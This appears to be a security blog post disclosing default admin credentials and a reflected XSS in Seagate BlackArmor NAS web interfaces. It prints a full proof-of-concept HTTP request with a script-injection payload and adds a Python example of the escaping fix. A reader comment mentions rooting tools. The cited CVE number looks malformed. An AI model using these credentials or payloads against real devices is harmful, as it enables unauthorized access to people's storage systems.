Seagate NAS Default Credentials and XSS

BlackArmor NAS 110 and BlackArmor NAS 220 both have default admin credentials:

Log in using the default settings. (The user name and password are case-sensitive.)
user name: admin
password: admin

Most fields seem to sanitize input, but I found one that allows a POST-based reflected XSS; the victim has to be authenticated as ‘admin’ (CVE-2013-78008):

POST /admin/system_general.php?lang=en&gi=sy001 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 192.168.1.100
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.100/admin/system_general.php?lang=en&gi=sy001
Cookie: PHPSESSID=4726b9442a30c876867c588f7d98a784; myFavoriteLang=en
Proxy-Connection: Keep-Alive
Content-Length: 280
Content-Type: application/x-www-form-urlencoded

machine_name=Backup&machine_desc=%22%3E%3Cscript%3Ealert%28%27DF%27%29%3C%2Fscript%3E&old_webgui_protocol=HTTP&webgui_protocol=HTTP&timezone=Europe%2FAthens&ntpservice=on&ntpserverlist=pool.ntp.org&datetime=Mon%2C+02+Sep+2013+08%3A25%3A09+%2B0300&orderdate=2013-09-02&btn=Submit
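The request body above shows the bug pattern: the machine_desc value is reflected into the page without escaping, so a value that starts with a double quote and a closing angle bracket can break out of the HTML attribute it lands in. The following Python snippet is an added example (not code from the post or from Seagate's firmware) that decodes the body shown above, renders the value into a hypothetical input widget the way the vulnerable page presumably does, renders it again with attribute-context escaping, and checks which version still contains a live script tag. The widget markup and the function names are assumptions for illustration.

```python
import html
from urllib.parse import parse_qs

# Constructed sample, trimmed from the request body on the page: machine_desc
# carries the URL-encoded "><script>alert('DF')</script> value.
SAMPLE_BODY = (
    "machine_name=Backup"
    "&machine_desc=%22%3E%3Cscript%3Ealert%28%27DF%27%29%3C%2Fscript%3E"
    "&old_webgui_protocol=HTTP&webgui_protocol=HTTP"
)


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into a flat dict
    (first value wins, as a typical PHP $_POST lookup would behave)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_vulnerable(desc: str) -> str:
    """Hypothetical reflection of the field into an attribute value with no
    escaping; this is the pattern that lets a quote close the attribute."""
    return f'<input type="text" name="machine_desc" value="{desc}">'


def render_hardened(desc: str) -> str:
    """Same widget with attribute-context escaping: html.escape turns the
    quotes into &quot; and the angle brackets into &lt;/&gt;, so the value can
    neither close the attribute nor open a new tag."""
    return f'<input type="text" name="machine_desc" value="{html.escape(desc, quote=True)}">'


def reflects_unescaped(rendered: str, marker: str = "<script>") -> bool:
    """Regression-style check: does a real tag (not an entity) survive in the
    rendered HTML? True means the value was reflected unescaped."""
    return marker in rendered


if __name__ == "__main__":
    form = parse_form(SAMPLE_BODY)
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        out = render(form["machine_desc"])
        print(f"{name}: reflected unescaped = {reflects_unescaped(out)}")
        print("  " + out)
```

In a PHP page such as system_general.php the equivalent fix is to pass the value through htmlspecialchars with ENT_QUOTES before echoing it into the attribute; the check function above is the kind of assertion a firmware regression test can keep around so the field does not silently lose its escaping again.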

One Response to “Seagate NAS Default Credentials and XSS”

  1. Jeroen Says:

    There are a lot more problems related to the Seagate BlackArmor NAS systems.

    For one, it’s rootable, meaning it is possible to enable the SSH daemon, change the root password and gain full system access.

    Have a look at http://www.nerdbox.it for some tools to perform these actions!
